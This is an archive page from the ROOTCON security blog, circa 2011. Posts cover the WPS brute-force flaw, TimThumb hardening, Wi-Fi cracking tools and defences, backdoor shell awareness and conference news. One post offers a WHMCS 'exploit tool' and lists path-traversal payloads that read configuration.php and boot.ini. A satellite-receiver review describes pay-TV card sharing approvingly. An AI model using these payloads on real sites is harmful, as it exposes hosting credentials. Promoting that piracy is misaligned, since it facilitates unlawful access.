Pages

Friday, December 30, 2011

WiFi Protected Setup (WPS) Is Vulnerable, 2 Bruteforce Tools Unleashed


Two computer security experts and network ninjas discovered that WiFi Protected Setup is vulnerable because it can be brute-forced using WPS pins which allow attackers to retrieve the WPA/WPA2 in less than 10 hours.
Aside from that, two penetration testing tools that cracks routers that have WPS on it have been released, made open source and available for download. These two tools are Reaver and Stefan Viehböck’s PoC Bruteforce Tool. Reaver was released by Tactical Network Solutions and the PoC Bruteforce Tool was obviously developed by Stefan Viehböck. Stefan said that his tool is a bit faster than Reaver but it does not support all Wi-Fi adapters. I haven’t tried Stefan’s tool yet but I was able to play and set Reaver tool in my Backtrack 5 Linux Operating System. 
Reaver version 1.1 has been released last night while I was writing a tutorial on how to set it up. You can download or wget Reaver version 1.1 or 1.0 on this link. And if you want to try Stefan Viehböck’s PoC Bruteforce Tool, you can download it here.


There is no patch yet for this vulnerability so it would be advisable to disable WPS in order to keep it away from your neighbors who are crackers.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Tuesday, December 20, 2011

Securing The TimThumb Script in Wordpress to Prevent Remote Code Execution

TimThumb Vulnerability is not a 0-day vulnerability anymore but there are still vulnerable Wordpress blogs today that are vulnerable to Remote Code Execution which is very risky.

Why this vulnerability is very risky and dangerous? Because it allows hackers to upload a backdoor in your website or deface your website. In fact, the self-proclaimed world’s no.1 hacker Gregory Evan’s blog was pawned with this kind of exploit. But we will not talk about Evan’s issue here whose name is flagged in Security Errata, our main topic is how to secure your TimThumb script if you have  a Wordpress blog that has timthumb.php.

How To Fix and Secure it:
1. Update to the latest version.

2. Omit flickr.com, picasa.com , img.youtube.com, upload.wikimedia.org, photobucket.com, imgur.com, imageshack.us, tinypic.com from this code:

$ALLOWED_SITES = array (        
                                  'flickr.com',         
                                  'picasa.com',         
                                  'img.youtube.com',         
                                  'upload.wikimedia.org',         
                                  'photobucket.com',         
                                  'imgur.com',         
                                  'imageshack.us',         
                                  'tinypic.com',     
                  );

3. Rename the TimThumb script and put some .htacess configuration or file on your sensitive folders just like how you secure an admin page.

4. Install security plugins.

5. Owh and make sure that the script have ALLOW_EXTERNAL line code set to false.

define ('ALLOW_EXTERNAL', FALSE);


You should update your blog or else you could end up like this:



About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Hackers Relief Ops CDO/ Iligan

Last December 17, 2011 typhoon Sendong struck the city of Cagayan De Oro and Iligan. The typhoon has caused huge damage to buildings, offices and homes and took away to near 700 lives, the two cities are in need of donations it might be in form of cash, clothes, canned goods and the like. Calling all Hackers and Geeks to participate this very little effort, ROOTCON Goons and a couple of fellow hackers are already planning to take part of this very sad tragedy.

You may donate through PayPal through the following:

CDO: francis.siason@gmail.com
Iligan: fleiremae@yahoo.com

ROOTCON and fellow hackers are accepting donations in form of cloths, canned goods, blanket and any other useful materials for our brothers and sisters in CDO and Iligan.

If you wish to donate through Hackers Relief Ops CDO/Iligan you may contact the following:

Cebu: ec [at] rootcon d0t org
Manila: Myself through Twitter (@semprix) and jhvallente [at] gmail d0t com

Our brothers and sisters in CDO and Iligan needs us this time.

Hackers Unite!!!!!

Monday, December 19, 2011

ROOTCON 6 Venue

We would like to officially announce ROOTCON 6 Date and Venue. ROOTCON 6 will be held on September 7-8, 2012 at Cebu Parklane International Hotel. To maintain the sanity and quality of the conference we set a limited tickets to 150 pax. The early registration cost is still Php2800.00.

ROOTCON 6 website will be launched soon, for now stay up-to-date on our Facebook (http://www.facebook.com/rootcon or follow us on Twitter (http://www.twitter.com/_rootcon_)

Tuesday, November 29, 2011

ProjectX WHMCS Exploit Tool


With the growing attacks of Local File Disclosure for WHMCS, I recently posted a Python Script which checks the vulnerability of a website powered  by WHMCS which my friend and I coded but I decided to dump it. 


But with the help of another friend whose name is lufi, we were able to materialize the same tool but this time it is coded in PHP and is user friendly. It is still aimed at exploiting WHMCS but we allow users to choose their own payload. 

Here are some payloads that may come in handy:
cart.php?a=projectx&templatefile=../../../configuration.php"
clients/cart.php?a=projectx&templatefile=../../../configuration.php"
submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.ini
clientarea.php?action=projectx&templatefile=../../configuration.php
reports.php?report=../../../../../../../boot.ini

You can download the full script here


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Wednesday, November 16, 2011

Filipino Penetration Testing Linux Distro on the Making


BackTrack, Blackbuntu, Backbox, Nodezro PHLAK, Knoppix-STD, Helix, etc.; these Linux distros are the common penetration testing distributions known today. But did you know that another Filipino is on the move on making a pentesting distro? Aside from semprix (the founder of ROOTCON) who is planning to make a BSD pentesting distro, we also have creatures who is currently developing a new Linux Distro which is the Project Playground.


Project Playground or “Pipi” is a pentesting distro based on Debian. It centers on web application security practice, it is packed with web apps intended to have vulnerabilities and weaknesses for you to practice. This includes DVWA, mutillidae, gruyere and webgoat and many more. Aside from those mentioned, articles and tutorials are also included.




For now the alpha release is available for download and I have already tried it. Kudos to creatures for the Alpha Release and for adding Nikto after my suggestion about the inclusion of the said tool and because it is still under development, you can email creatures at ysda27[at]gmail[dot]com or visit his website for more updates about his project. I hope he will add Metasploit on his distro! Creatures is currently planning on creating a GUI (Graphical User Interface) for the tools and web apps and you can stalk some of his tutorials on the ProjectX Blog.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Monday, November 07, 2011

ROOTCON Email Updates

We have decommissioned info [at] rootcon d0t org, for all general inquiries send them to the new email address at comms /you-know-what/ rootcon dot org.

Details can be found at
http://www.rootcon.org/xml/contacts - Contact Details
http://www.rootcon.org/xml/faq/ - FAQ

Thursday, October 20, 2011

A Quick Review on Openbox S10 Satellite Receiver


Are you a satellite hobbyist or interested in satellite security? Well then, this satellite receiver is for you!

Meet Openbox S10 HD Satellite Receiver, a Linux MIPS (Microprocessor without Interlocked Pipeline Stages) OS satellite receiver that has a CCcam Plugin for watching HD (High- Definition) in your TV. It has similar functions of a Dreambox Satellite Receiver but is the cheapest and easy to configure satellite receiver that the world has ever known.

So what’s with this satellite receiver? Unlike other satellite receivers that you receive if you subscribe with satellite cable companies like GSAT, CIGNAL, and Dream, this kind of receiver is configurable and can be loaded with flash images.

This is an ideal tool for satellite hobbyist who loves to shoot FTA (Free to Air) and encrypted channels in different frequencies. And because this kind of receiver has an Ethernet port, this can be used for card sharing also known as control word sharing which is a popular method of pirate decryption.

Basically, card sharing allows access to a specific valid subscription for multiple clients or satellite receivers. A smart card is attached to a satellite receiver loaded with software that supports the “control word” over the Internet.

Openbox S10 (the successor of Openbox S9) supports HD and if paired with a LED (Light Emitting Diode) TV, the graphics are god-like or should I say “imba”. In fact, my father and I tried testing it with just a CRT (Cathode Ray Tube) TV and it’s like watching channels in a DVD Bluray mode.
This satellite receiver has a user-friendly GUI (Graphic User Interface) and is one of the coolest satellite receivers and boots faster than any set-top boxes out there.

Below are the complete specifications of this set-top box:

1.     300 MHz MIPS Processor - Linux Operating System
2.     Fully compliant MPEG-4 H.264/AVC Main Profile Level 3 & High Profile Level 4.1
3.     Fully compliant MPEG-2 MP@HL & MP@ML
4.     Fully compliant MPEG-1 Layer I & II & III, Dolby Digital Audio (AC3)
5.     SCPC & MCPC receivable from C/Ku band satellites
6.     Multiple LNB-Switching control (supports DiSEqC1.0/ 1.1/ unicable/1 .2/ 1.3 (USALS) supported)
7.     NIT search supported
8.     Support MHEG-5
9.     Support HDMI 1.3
10.  Support PVR (store in USB disk)
11.  Multimedia files playback (by USB)
12.  Support Electronic Program Guide (EPG) for 7 days
13.  Teletext and subtitle out through OSD
14.  Support multi-lingual DVB subtitle and teletext
15.  Automatic and manual channel scan options
16.  Automatic service scan
17.  Channel-change time: 1 second
18.  OSD in many languages and skin-support
19.  Multilingual support on screen menu (OSD): English, French, Deutsch, Italian, Spanish, Swedish, Danish, Greece, Portuguese, Finland, Holland, Turkish, Czech, selectable
20.  LED Display
21.  Multiple display modes: 1080i/720p/570p/576i/480p
22.  MPEG-2 / H.264 Hardware decoding
23.  Videotext Decoder
24.  Analog audio output: stereo(L+R)
25.  Screen format: auto, 4:3, and 16:9
26.  Upgrade software through USB2.0 port
27.  Powerful program management function, parent lock
28.  CA 1x slot and CI 1xslot
29.  10/100Mbit Ethernet Interface
30.  Directly bouquet-lists
31.  Size (W x D x H): 300 mm x 220 mm x 56 mm Weight: 2.0 kg without USB HDD

The receiver is really good and I hope next time they will improve their firmware by including new capabilities like able to play AVI, MKV, etc. so that it will surpass the capabilities of a multimedia player.

And by the way, for those of you who are interested in shooting FTA channels just visit Lyngsat.com for more resources.

Happy shooting guys!

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.


ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Sunday, October 02, 2011

Be on Guard against Crackers and Wardrivers by Securing your Wi-Fi at Home


In my last article, I demystified an easy to use tool that cracks Wi-Fi AP’s (Access Points) easier. Now it’s time to give some tips about securing your Wi-Fi AP at home. 

But first of all why do we need to secure our AP? Well, if someone is using your connection then it can decrease your speed (duh!). And the intruder could sniff the packets in your network or he or she may try to exploit your own PC (Personal Computer). 

Scared? Don’t worry we have some simple configurations and setups for you in order to protect your privacy and your Wi-Fi network. Here are some simple steps you can apply:

1. The most obvious thing you should do first is to determine the login page of your router by typing the internal IP address of your router in the browser. (For example 192.168.1.1 or 192.168.2.1)

2. Once you are done logging in to your router, read the manual so that you will be familiar with your router.

3. The next thing you should do is to change the default values for the admin and password settings under the Administration settings of your router. Create a unique password and don’t use common passwords.

4. Change the SSID (Service Set Identifier) name or the Wireless network name so that the attacker could not identify the model of your router because he could google it in order to search for exploits. Don’t use your name or other obvious information for the SSID.

5. In order to prevent other users from accessing your AP, enable network encryption. There are several encryptions for wireless security settings which includes; WEP (Wired Equivalent Privacy), WPA (WPA-Personal), and WPA2 (Wi-Fi Protected Access version 2). WEP can be easily cracked and is the most basic encryption thus making it least secure. Use WPA2 (AES) encryption because it is the most secured encryption.

6. For the WPA2 encryption, use a unique or complex passphrase so that crackers will have a hard time cracking it with their wordlist. If you suspect any activities, change your passphrase monthly. The cracker could have a hard time cracking it because he is only as good as his wordlist.

7. Reduce the signal of your wireless router; you could do this by decreasing the signal range by either changing the mode of your router to 802.11g (instead of 802.11n or 802.11b) or use a different wireless channel.

8. Enable MAC filtering so that it will only allow friendly MAC addresses on the AP. But sad to say, MAC addresses can be spoofed but first things first, the attacker should know one of the MAC addresses connected to the wireless network before he can spoof it thus he needs to sniff the packets first.

9. Update the firmware of your router by checking the official website of the manufacturer in order to be on guard with the latest exploits. And also because some old routers don't have WPA2 encryption in their firmware.

10. Then to check for users connected to your wireless network open your router's administration page (using the 192.168.* address) and look for the DHCP Clients Table (it's under Status > Local Network on Linksys routers). Here you will see a list of all computers and wireless devices that are connected to your home network. But you could also use Airsnare which is a “free utility that alerts you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place”.


11. And if you are too paranoid, apply the Anti-Wifi Paint. LOL!



Well, that’s it for now! If you want to add some other tips, just reply to this blog article.



About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.


ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Sunday, September 25, 2011

The Simple Mass WEP and WPA Cracker

If there is Piata Scanner for scanning and cracking mass SSH (Secure Shell), there is also Wifite.py for mass WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) cracking. Wait, wait… say what??

You read me right! There is Wifite.py for mass WEP and WPA cracking. Wifite.py is a cool tool coded in python which makes cracking WIFI passwords and security easier. It can be executed by using the command line python wifite.py or ./wifite.py. To see a list of command lines with detailed information for the script, you can just type in the terminal ./wifite.py –help or python wifite.py –help.

The tool is customizable to be automated with only a few arguments. Cool ey? Yeah, but it should always be noted that it requires Aicrack-ng suite which is used for auditing wireless networks and also needs macchanger which is of course  available via apt-get install.

What makes this tool easier is that it also has a GUI mode which runs by default after executing the script if it has a python-tk module. So far, the tool works good on my Backtrack 5 R1 and my Ubuntu 10.04 and a must have for Wi-Fi ninja geeks out there. It also works great with Blackbuntu. Not to mention that it also has a built in updater and can be updated by the command line ./wifite.py –upgrade or python wifite.py –upgrade.

Wifite.py was also mentioned in New York Times' article "New Hacking Tools Pose Bigger Threats to Wi-Fi Users" last February 16, 2011.

If you want to download the python script, click here.


About the Contributor:

Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section. Email your contributions to info[at]rootcon[dot]org.


ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Tuesday, September 20, 2011

Demystifying a Backdoor Shell


Last July 29, 2011, I was able to give a talk about Backdoor Shells and IRC (Internet Relay Chat) Bots in Techbar Cebu for the Cebu Linux Users Group (CEGNULUG) Talk.  In the said talk I explained and showed what a backdoor shell is and how it can be a chronic threat to all websites. I also showed how to run an IRC Bot using the backdoor shell I have. The purpose of my topic was to promote security awareness and to give idea about the backdoor shell’s hidden danger.

So what is a backdoor shell? A backdoor shell is a piece of code in PHP, ASP, JSP, etc. which can be uploaded to a site to gain access to files stored on the website. Once it is uploaded, the cracker could use it to edit, delete, and download any files on the website, or could even upload their own.

Now, there are many ways of how a site gets backdoored, it could be due to website vulnerability attacks or exploits like SQLI (Structured Query Language Injection), RFI (Remote File Inclusion), LFI (Local File Inclusion), FTP (File Transfer Protocol) Bruteforce Attacks, Sniffing, XSS (Cross Site Scripting), etc. There are many to mention but these are the most common attacks.

PHP Backdoor shells are the most used backdoor shells because most of the websites are coded in PHP. These kind of backdoor shells are like terminal emulators wherein you can execute UNIX and bash commands which allow crackers and defacers to manipulate the server or the operating system your website is currently hosted.


So how risky could it be? Well first of all, your site could get defaced on the index page which is really shameful or the cracker could use the website as a scam page or a phishing site. Shells could also be used to gain the root access of the site if it’s a Linux server. Crackers could also use your site for spamming and for hosting their botnets. Crackers could spread the backdoor shell across your files for backup purposes. And worst of all, the site could then be used to host their denial-of-service (DoS) or distributed denial-of-service attack (DDoS) shells (ex. host booter).


According to Zone-H, they archived 1,419,203 defaced web­sites. Linux became the most used OS for web servers and of course the pre­ferred target for the defacers. Why? Because of certain benefits and many things a defacer or a cracker could play around like putting a backdoor shell on it. 

What Zone-H archived only accounts to those defaced websites that were submitted to them by defacers, thus there are still unaccounted websites out there which are not leaked just for the cracker or defacer’s compensation. We just could not deny the fact that there are still websites out there wherein the administrator is not aware of such cyber espionage.

Now the question is, “Is your website one of those unaccounted websites with backdoors?”


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.


ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Sunday, September 04, 2011

ROOTCON 5 Full Page Ad Published in "The Freeman"

(Click Image to Enlarge)

The image above paints a thousand words. This one (1) full page ad is published in "The Freeman" (Cebu newspaper) today, dated September 4, 2011 (Sunday).

Thanks to James Arthur Oliva for the photos and his models. Thanks also to Paul Villacorta for the graphic works.

Kudos to you guys for supporting ROOTCON!


About the Contributor:
A self-confessed blogger minus the coffee. He maximizes his skills in consultancy, project management, professional networking, social media campaigns and very active in conceptualizing things. To date he already conducted several IT / Information Security events as his passion since 2007. Currently he's working as a Technical Support Specialist in a local company.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.
All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.



Saturday, September 03, 2011

[UPDATE] RC 5 Panelist

We have identified our list of panelist for the upcoming ROOTCON 5 Panel Discussion.

Day 1:  InfoSec State In The Philippines

Oliver Cam - Development and General Manager InfoWeapons Inc.

Roland Dela Paz - Security and Threat Researcher at TrendMicro

Atty. Al Vitangcol - Lawyer specializing in e-Commerce law.

Jaime Licauco - Security Professional that holds CISSP and GSEC certification

Day 2: Cyber Terrorism What Is Our Stand

Paul Sabanal - Security Research at IBM Security Systems, speaker at BlackHat Briefings

Sven Herpig - Professor and a PhD student specilizing CyberWarfare

Chris Boyd - Senior Threat Researcher at GFI, holds a title of Microsoft MVP for Computer Security

Berman Enconado - Senior Software Engineer at GFI

More updates on the ROOTCON 5 Panel Discussion will be published soon.

Thursday, September 01, 2011

ROOTCON Panel Discussion

Sad to say that one of our speakers backed-out at a very last minute. Due to very limited time, we don't have enough time to look for another replacement, and our speakers on the waiting list cannot do the talk because of very limited time to prepare for their presentation

And as a replacement, we will be having a ROOTCON Panel Discussion both on Day 1 and Day 2. Panel Discussion is a very good alternative in finding speakers, as this will create an interaction and a healthy discussion between our selected panelist and con-goers.

Our Panel Topics for this years conference are the following:

InfoSec State in the Country (Philippines) - Day 1
Cyber Terrorism What Is Our Stand - Day 2

Selected Panelist will be debating / discussing this two high-end topics during the panel discussion and at the same time get inputs from the audience.

Our Panelist will be announced on Friday.

Stay Tuned for Updates.


Sunday, August 21, 2011

Reminiscing the Hacker’s Manifesto


Have you guys heard of the Hacker’s Manifesto?

Probably some of you may say yes and some may say no. But for those of you who haven’t heard of it, it’s an essay written by Loyd Blankenship (a.k.a. The Mentor, stylized as +++The Mentor+++).

It’s also known as the “The Conscience of a Hacker” which was written on January 8, 1986 which followed after the arrest of Loyd and was published in an underground ezine (online magazine) Phrack.

So who is Loyd Blankenship a.k.a The Mentor? He is a well known American computer hacker and writer since the 80’s and was a member of the hacker groups, “Extasyy Elite” and “Legion of Doom”. He also wrote the game “Cyberpunk” which was seized by the Secret Service.

It is believed that the “Hacker’s Manifesto” is the cornerstone and the foundation of the hacker culture and the article also gave some insight into the psychology of early hackers.

The Manifesto states that hackers hack out of curiosity and that they want to learn more.

Hackers don’t learn to hack, they hack to learn.

The article reflects the attitude and the personality of the hackers in the early 80’s and 90’s. During these days, being a script kiddie was moderately cool, packet wars were in and lame DOS attacks like WinNUKE and the ath0++ modem drop were cool.

Phreaking also became a mainstream during these days and that sharing of knowledge like cracking, cryptography, programming (C++, VB, Delphi, C, Pascal, Assembly, Python, PERL, Bash and so on), network security, Linux, Windows, UNIX, etc. became the main topics in IRC.

The essay of Loyd was also quoted in the 1995 Movie entitled “Hackers”. Mentor received a credit from this movie. Also a poster about the said article appears in the movie "The Social Network" on the wall of Mark Zuckerberg's dorm room.

Below is the complete essay of +++The Mentor+++:

Loyd Blankenship a.k.a +++The Mentor+++


The Hacker’s Manifesto

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime
Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered
for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.



About the Contributor:

Shipcode is an InfoSec enthusiast from Cebu. During his high school days he was just an ordinary script kiddie. He loves to search for web exploits and other issues concerning network / wireless security.



ROOTCON is managed by like minded InfoSec professionals across the Philippines.
All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.